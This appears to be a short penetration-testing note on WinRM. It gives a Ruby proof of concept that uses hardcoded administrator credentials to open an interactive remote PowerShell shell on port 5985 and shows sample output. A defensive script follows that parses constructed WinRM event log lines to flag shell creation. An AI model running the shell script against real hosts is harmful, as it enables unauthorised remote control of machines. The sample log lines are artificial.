WinRM Shell

Windows Remote Management, or WinRM, is a Windows-native, built-in remote management protocol that, in its simplest form, uses the Simple Object Access Protocol (SOAP) to interface with remote computers and servers, as well as with operating systems and applications. Source: link

If you have obtained valid WinRM credentials and can reach port 5985 (the /wsman endpoint), you can use the PoC below to obtain an interactive PowerShell shell.

The default HTTP port for WinRM is 5985.

# gem install winrm
# cat winrm_shell.rb
require 'winrm'

# Connection parameters used by the PoC: plain HTTP on the default port 5985
conn = WinRM::Connection.new(
  endpoint: 'http://192.168.78.185:5985/wsman',
  user: 'administrator',
  password: 'administrator123',
)

# Declared outside the loop so the exit code of the last command is still
# available once the loop ends
output = nil

conn.shell(:powershell) do |shell|
  # Read one command per line until the user types "exit" or stdin is closed
  # (gets returns nil on EOF, which the original loop did not handle)
  loop do
    print "PS > "
    command = gets
    break if command.nil? || command.strip == "exit"
    # Stream stdout/stderr from the remote PowerShell session as it arrives
    output = shell.run(command) do |stdout, stderr|
      STDOUT.print stdout
      STDERR.print stderr
    end
  end
  puts "Exiting with code #{output.exitcode}" if output
end

Run the Ruby script to obtain the shell. Make sure the winrm gem is installed (gem install winrm, as shown above) before running the PoC.

# ruby winrm_shell.rb
PS > whoami
test\administrator
PS >
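As an added defensive counterpart to the PoC (this is not code from the original post), the Ruby script below correlates records from the Microsoft-Windows-WinRM/Operational log on the target: event 169 (user authenticated) followed by event 91 (WSMan shell created, with the ResourceUri that distinguishes a PowerShell shell from a cmd shell) is the trace an interactive session like the one above leaves behind. The log lines and their wording are constructed approximations of those records, not captured Windows output.

```ruby
# Added example: attribute WinRM shell creations to users from constructed
# Microsoft-Windows-WinRM/Operational records ("timestamp,event_id,message").
# Message text is an approximation of the real event wording.
SAMPLE_LOG = <<~'LOG'
  2024-01-15T10:01:02Z,169,User TEST\administrator authenticated successfully using NTLM authentication
  2024-01-15T10:01:03Z,91,Creating WSMan shell on server with ResourceUri: http://schemas.microsoft.com/powershell/Microsoft.PowerShell
  2024-01-15T10:05:00Z,169,User TEST\svc_backup authenticated successfully using Kerberos authentication
  2024-01-15T10:05:01Z,91,Creating WSMan shell on server with ResourceUri: http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd
  2024-01-15T10:07:00Z,169,User TEST\svc_backup authenticated successfully using Kerberos authentication
  2024-01-15T10:07:01Z,142,WSMan operation Enumerate failed, error code 2150858770
LOG

# Pairs each shell-creation event (91) with the most recent authentication
# event (169) and returns one alert hash per shell.
def winrm_shell_alerts(log)
  last_auth = nil
  alerts = []
  log.each_line do |line|
    ts, id, msg = line.strip.split(',', 3)
    next if msg.nil?
    case id
    when '169'
      m = msg.match(/User (\S+) authenticated successfully using (\w+) authentication/)
      last_auth = { user: m[1], auth: m[2] } if m
    when '91'
      uri = msg[/ResourceUri: (\S+)/, 1].to_s
      alerts << {
        time: ts,
        user: last_auth ? last_auth[:user] : 'unknown',
        auth: last_auth ? last_auth[:auth] : 'unknown',
        # The winrm gem's :powershell shell requests the PowerShell ResourceUri;
        # the cmd ResourceUri indicates a plain :cmd shell instead
        shell: uri.include?('/powershell/') ? 'powershell' : 'cmd',
        # Connecting by IP with a local account, as the PoC does, cannot use
        # Kerberos and falls back to NTLM, which is worth a closer look on a
        # domain-joined host
        ntlm: !last_auth.nil? && last_auth[:auth] == 'NTLM'
      }
    end
  end
  alerts
end

if __FILE__ == $0
  winrm_shell_alerts(SAMPLE_LOG).each { |a| puts a.inspect }
end
```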
